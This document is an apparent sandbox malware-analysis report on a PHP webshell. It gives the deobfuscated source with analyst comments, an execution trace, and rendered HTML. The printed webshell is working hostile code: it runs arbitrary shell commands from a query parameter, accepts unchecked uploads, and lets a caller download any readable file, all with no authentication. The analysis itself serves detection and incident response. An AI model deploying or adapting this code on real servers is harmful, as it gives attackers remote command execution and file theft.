PHP Malware Analysis

webshell.php

md5: 83ca057e1aca4b64d4db97f1914a298a


Screenshot


Attributes

Execution

Files

Input

URLs


Deobfuscated PHP code

<?php

// Analyst note: file-read branch of the webshell. The `download` query
// parameter is used verbatim as a filesystem path; nothing here checks who is
// asking or confines the path to a base directory, so any file the PHP
// process can read is streamed back to the requester.
// Log signal: the directory listing further down builds links of the form
// `?download=<absolute path>`, so requests with that shape in web access logs
// are a direct record of this branch being used.
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        // basename() only shapes the suggested save-as name; the file read
        // below is still the full, caller-chosen path.
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        // Stop here so none of the HTML interface below is appended to the file bytes.
        exit;
    }
}
?>

<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<div class="container">


<?php 
/**
 * Build an `ls -l`-style ten-character permission string (for example
 * 'drwxrwxrwx') from the mode bits that fileperms() reports for $file.
 *
 * Analyst note: the file-type detection is faulty. Each branch tests a single
 * mask with `&` instead of comparing `$mode & 0xF000` against the type code,
 * so a type whose code shares a bit with an earlier branch is reported as
 * that earlier type (0x6000 and 0xA000 match the 0x2000 test and show as 'c';
 * 0xC000 matches the 0x4000 test and shows as 'd'). The 'b', 'l' and 's'
 * branches can therefore never be taken. The return value of fileperms() is
 * not checked for failure.
 *
 * @param string $file Path whose permissions are rendered.
 * @return string Type character followed by owner, group and world rwx triplets.
 */
function printPerms($file)
{
    $mode = fileperms($file);
    // File-type character (see the note above about the bit tests).
    if ($mode & 0x1000) {
        $type = 'p';
    } else {
        if ($mode & 0x2000) {
            $type = 'c';
        } else {
            if ($mode & 0x4000) {
                $type = 'd';
            } else {
                if ($mode & 0x6000) {
                    $type = 'b';
                } else {
                    if ($mode & 0x8000) {
                        $type = '-';
                    } else {
                        if ($mode & 0xa000) {
                            $type = 'l';
                        } else {
                            if ($mode & 0xc000) {
                                $type = 's';
                            } else {
                                // None of the tested bits set: reported as unknown.
                                $type = 'u';
                            }
                        }
                    }
                }
            }
        }
    }
    // Plain read/write/execute bits for owner, group and world (octal masks).
    $owner["read"] = $mode & 0400 ? 'r' : '-';
    $owner["write"] = $mode & 0200 ? 'w' : '-';
    $owner["execute"] = $mode & 0100 ? 'x' : '-';
    $group["read"] = $mode & 040 ? 'r' : '-';
    $group["write"] = $mode & 020 ? 'w' : '-';
    $group["execute"] = $mode & 010 ? 'x' : '-';
    $world["read"] = $mode & 04 ? 'r' : '-';
    $world["write"] = $mode & 02 ? 'w' : '-';
    $world["execute"] = $mode & 01 ? 'x' : '-';
    // Special bits replace the execute column: 0x800 (setuid) and 0x400
    // (setgid) become 's'/'S', 0x200 (sticky) becomes 't'/'T'. Lower case
    // means the execute bit underneath is also set.
    if ($mode & 0x800) {
        $owner["execute"] = $owner['execute'] == 'x' ? 's' : 'S';
    }
    if ($mode & 0x400) {
        $group["execute"] = $group['execute'] == 'x' ? 's' : 'S';
    }
    if ($mode & 0x200) {
        $world["execute"] = $world['execute'] == 'x' ? 't' : 'T';
    }
    // "%1s" is a minimum width of one, so these calls amount to plain concatenation.
    $s = sprintf("%1s", $type);
    $s .= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
    $s .= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
    $s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
    return $s;
}
// Analyst note: main request handler of the webshell. It runs on every request
// that did not exit in the download branch, and the file contains no
// authentication check of any kind.
//
// Working directory: taken from the `dir` query parameter and overridden by a
// POSTed `dir` when present. $_GET['dir'] is read without isset(), so $dir is
// NULL on a bare request.
$dir = $_GET['dir'];
if (isset($_POST['dir'])) {
    $dir = $_POST['dir'];
}
$file = '';
// Missing or non-directory input falls back to './'.
if ($dir == NULL or !is_dir($dir)) {
    if (is_file($dir)) {
        // Looks like leftover debugging: prints "enters" and the supplied path
        // unescaped. $file is not read again in this listing.
        echo "enters";
        $file = $dir;
        echo $file;
    }
    $dir = './';
}
// $value has not been assigned at this point (the foreach loops below are the
// first to set it), so this simply resolves "$dir/" to an absolute path.
$dir = realpath($dir . '/' . $value);
$dirs = scandir($dir);
// Interface output. $dir, $_SERVER['PHP_SELF'] and $_GET['dir'] are written
// into the markup without HTML escaping, and the first hidden field's value is
// not quoted.
echo "<h2>Viewing directory " . $dir . "</h2>";
// Command form: submits `cmd` and the resolved directory back to this script via GET.
echo "\n<br><form action='" . $_SERVER['PHP_SELF'] . "' method='GET'>";
echo "<input type='hidden' name='dir' value=" . $dir . " />";
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
// Upload form: posts the file together with `dir`, which is filled from the
// raw $_GET['dir'] rather than the resolved $dir.
echo "\n<br>\n<div class='navbar-form'><form action='" . $_SERVER['PHP_SELF'] . "' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='" . $_GET['dir'] . "'/> ";
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";
// File-write branch: stores the uploaded file under $dir, named after the
// client-supplied filename reduced by basename(). Extension, content type and
// size are not checked; the only guard is refusing to overwrite an existing
// path. For responders: any location the PHP process can write to may have
// received new files through this branch, so review it for unexpected additions.
if (isset($_POST['submit'])) {
    $uploadDirectory = $dir . '/' . basename($_FILES['fileToUpload']['name']);
    if (file_exists($uploadDirectory)) {
        echo "<br><br><b style='color:red'>Error. File already exists in " . $uploadDirectory . ".</b></br></br>";
    } else {
        if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
            echo '<br><br><b>File ' . $_FILES['fileToUpload']['name'] . ' uploaded successfully in ' . $dir . ' !</b><br>';
        } else {
            echo '<br><br><b style="color:red">Error uploading file ' . $uploadDirectory . '</b><br><br>';
        }
    }
}
// Command-execution branch: the `cmd` query parameter is concatenated into a
// shell command line and run by exec() with the privileges of the PHP process;
// every output line is echoed back without escaping.
// Because the value travels in the query string, submitted commands appear in
// the request URL, which makes web access logs a primary source for
// reconstructing what was run through this file.
if (isset($_GET['cmd'])) {
    echo "<br><br><b>Result of command execution: </b><br>";
    exec('cd ' . $dir . ' && ' . $_GET['cmd'], $cmdresult);
    foreach ($cmdresult as $key => $value) {
        echo "{$value} \n<br>";
    }
}
echo "<br>";
?>

<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<?php 
// Analyst note: renders one table row per scandir() entry. Directories link
// back to this script with `?dir=<resolved path>/`; everything else links to
// the download branch with `?download=<resolved path>`. Entry names and paths
// are echoed without HTML or URL escaping.
// Two quirks explain what the sandbox output shows:
//  - `[name]` is a bare constant, not the string 'name'. Before PHP 8 an
//    undefined constant falls back to its own name as a string (with a notice
//    or warning); from PHP 8 it raises an Error.
//  - printPerms() is given $dir, not the entry, so every row repeats the
//    permissions of the directory being listed.
foreach ($dirs as $key => $value) {
    echo "<tr>";
    if (is_dir(realpath($dir . '/' . $value))) {
        echo "<td><a href='" . $_SERVER['PHP_SELF'] . "?dir=" . realpath($dir . '/' . $value) . "/'>" . $value . "</a></td><td>" . posix_getpwuid(fileowner($dir . '/' . $value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
    } else {
        echo "<td><a href='" . $_SERVER['PHP_SELF'] . "?download=" . realpath($dir . '/' . $value) . "'>" . $value . "</a></td><td>" . posix_getpwuid(fileowner($dir . '/' . $value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
    }
    echo "</tr>";
}
echo "</tbody>";
echo "</table>";
?>



</div>
</html>

Execution traces

data/traces/83ca057e1aca4b64d4db97f1914a298a_trace-1676244184.0626.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:29.960410]
1	0	1	0.000222	393528
1	3	0	0.000476	427504	{main}	1		/var/www/html/uploads/webshell.php	0	0
1		A						/var/www/html/uploads/webshell.php	65	$dir = NULL
1		A						/var/www/html/uploads/webshell.php	69	$file = ''
2	4	0	0.000546	427504	is_file	0		/var/www/html/uploads/webshell.php	71	1	NULL
2	4	1	0.000562	427544
2	4	R			FALSE
1		A						/var/www/html/uploads/webshell.php	76	$dir = './'
2	5	0	0.000593	427536	realpath	0		/var/www/html/uploads/webshell.php	78	1	'.//'
2	5	1	0.000609	427616
2	5	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/webshell.php	78	$dir = '/var/www/html/uploads'
2	6	0	0.000636	427552	scandir	0		/var/www/html/uploads/webshell.php	80	1	'/var/www/html/uploads'
2	6	1	0.000674	428176
2	6	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'webshell.php']
1		A						/var/www/html/uploads/webshell.php	80	$dirs = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'webshell.php']
1		A						/var/www/html/uploads/webshell.php	125	$key = 0
2	7	0	0.000735	428192	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.'
2	7	1	0.000749	428272
2	7	R			'/var/www/html/uploads'
2	8	0	0.000764	428192	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads'
2	8	1	0.000780	428256
2	8	R			TRUE
2	9	0	0.000794	428280	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/.'
2	9	1	0.000807	428360
2	9	R			'/var/www/html/uploads'
2	10	0	0.000822	428328	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/.'
2	10	1	0.000838	428368
2	10	R			0
2	11	0	0.000850	428280	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	11	1	0.000883	429080
2	11	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	12	0	0.000917	428296	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	13	0	0.000931	428296	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	13	1	0.000946	428336
3	13	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	14	0	0.001081	429424	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	14	1	0.001097	429808
3	14	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	15	0	0.001121	429744	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	15	1	0.001136	430128
3	15	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	16	0	0.001161	429456	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	16	1	0.001175	429840
3	16	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	17	0	0.001198	429456	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	17	1	0.001213	429840
3	17	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	12	1	0.001235	428336
2	12	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 1
2	18	0	0.001260	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/..'
2	18	1	0.001273	428296
2	18	R			'/var/www/html'
2	19	0	0.001287	428208	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html'
2	19	1	0.001301	428240
2	19	R			TRUE
2	20	0	0.001315	428280	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/..'
2	20	1	0.001335	428352
2	20	R			'/var/www/html'
2	21	0	0.001349	428312	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/..'
2	21	1	0.001364	428368
2	21	R			0
2	22	0	0.001377	428272	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	22	1	0.001401	429072
2	22	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	23	0	0.001430	428288	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	24	0	0.001443	428288	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	24	1	0.001458	428320
3	24	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	25	0	0.001587	429408	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	25	1	0.001601	429792
3	25	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	26	0	0.001624	429728	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	26	1	0.001639	430112
3	26	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	27	0	0.001661	429440	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	27	1	0.001676	429824
3	27	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	28	0	0.001698	429440	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	28	1	0.001712	429824
3	28	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	23	1	0.001733	428320
2	23	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 2
2	29	0	0.001758	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.htaccess'
2	29	1	0.001774	428312
2	29	R			'/var/www/html/uploads/.htaccess'
2	30	0	0.001789	428224	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.htaccess'
2	30	1	0.001804	428272
2	30	R			FALSE
2	31	0	0.001817	428312	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.001830	428400
2	31	R			'/var/www/html/uploads/.htaccess'
2	32	0	0.001845	428360	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/.htaccess'
2	32	1	0.001858	428400
2	32	R			0
2	33	0	0.001870	428304	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	0
2	33	1	0.001892	429104
2	33	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	34	0	0.001921	428336	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	35	0	0.001934	428336	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	35	1	0.001949	428368
3	35	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	36	0	0.002082	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	36	1	0.002096	429840
3	36	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	37	0	0.002119	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	37	1	0.002134	430160
3	37	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	38	0	0.002156	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	38	1	0.002171	429872
3	38	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	39	0	0.002192	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	39	1	0.002206	429872
3	39	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	34	1	0.002228	428368
2	34	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 3
2	40	0	0.002252	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/data'
2	40	1	0.002268	428312
2	40	R			'/var/www/html/uploads/data'
2	41	0	0.002282	428224	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/data'
2	41	1	0.002297	428272
2	41	R			TRUE
2	42	0	0.002310	428296	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/data'
2	42	1	0.002323	428384
2	42	R			'/var/www/html/uploads/data'
2	43	0	0.002338	428344	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/data'
2	43	1	0.002351	428384
2	43	R			0
2	44	0	0.002363	428288	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	44	1	0.002386	429088
2	44	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	45	0	0.002415	428304	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	46	0	0.002428	428304	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	46	1	0.002443	428336
3	46	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	47	0	0.002571	429424	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	47	1	0.002584	429808
3	47	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	48	0	0.002606	429744	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	48	1	0.002621	430128
3	48	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	49	0	0.002644	429456	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	49	1	0.002658	429840
3	49	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	50	0	0.002680	429456	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	50	1	0.002695	429840
3	50	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	45	1	0.002717	428336
2	45	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 4
2	51	0	0.002742	428232	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/prepend.php'
2	51	1	0.002756	428328
2	51	R			'/var/www/html/uploads/prepend.php'
2	52	0	0.002771	428232	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/prepend.php'
2	52	1	0.002786	428288
2	52	R			FALSE
2	53	0	0.002800	428328	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/prepend.php'
2	53	1	0.002813	428424
2	53	R			'/var/www/html/uploads/prepend.php'
2	54	0	0.002832	428376	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/prepend.php'
2	54	1	0.002846	428416
2	54	R			0
2	55	0	0.002858	428312	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	0
2	55	1	0.002880	429112
2	55	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	56	0	0.002909	428344	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	57	0	0.002923	428344	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	57	1	0.002938	428368
3	57	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	58	0	0.003067	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	58	1	0.003081	429840
3	58	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	59	0	0.003104	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	59	1	0.003119	430160
3	59	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	60	0	0.003142	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	60	1	0.003156	429872
3	60	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	61	0	0.003178	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	61	1	0.003193	429872
3	61	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	56	1	0.003215	428368
2	56	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 5
2	62	0	0.003239	428232	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/webshell.php'
2	62	1	0.003253	428328
2	62	R			'/var/www/html/uploads/webshell.php'
2	63	0	0.003267	428232	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/webshell.php'
2	63	1	0.003282	428288
2	63	R			FALSE
2	64	0	0.003296	428328	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/webshell.php'
2	64	1	0.003309	428424
2	64	R			'/var/www/html/uploads/webshell.php'
2	65	0	0.003324	428408	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/webshell.php'
2	65	1	0.003337	428448
2	65	R			1000
2	66	0	0.003349	428344	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	1000
2	66	1	0.003380	429160
2	66	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2	67	0	0.003410	428344	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	68	0	0.003423	428344	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	68	1	0.003438	428368
3	68	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	69	0	0.003718	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	69	1	0.003735	429840
3	69	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	70	0	0.003759	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	70	1	0.003774	430160
3	70	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	71	0	0.003798	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	71	1	0.003813	429872
3	71	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	72	0	0.003835	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	72	1	0.003850	429872
3	72	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	67	1	0.003873	428368
2	67	R			'drwxrwxrwx'
1	3	1	0.003888	428168
			0.003925	327400
TRACE END   [2023-02-12 21:23:29.964155]


Generated HTML code

<html><!-- Latest compiled and minified CSS --><head><link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

</head><body><div class="container">


<h2>Viewing directory /var/www/html</h2>
<br><form action="/webshell.php" method="GET"><input type="hidden" name="dir" value="/var/www/html"><input type="text" name="cmd" autocomplete="off" autofocus="">
<input type="submit" value="Execute">
</form>
<br>
<div class="navbar-form"><form action="/webshell.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dir" value=""> <input type="file" name="fileToUpload" id="fileToUpload">
<br><input type="submit" value="Upload File" name="submit"></form></div><br>
<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<tr><td><a href="/webshell.php?dir=/var/www/html/">.</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?dir=/var/www/">..</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?download=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?download=/var/www/html/webshell.php">webshell.php</a></td><td>osboxes</td><td> drwxrwxrwx</td>
</tr></tbody></table>


</div>

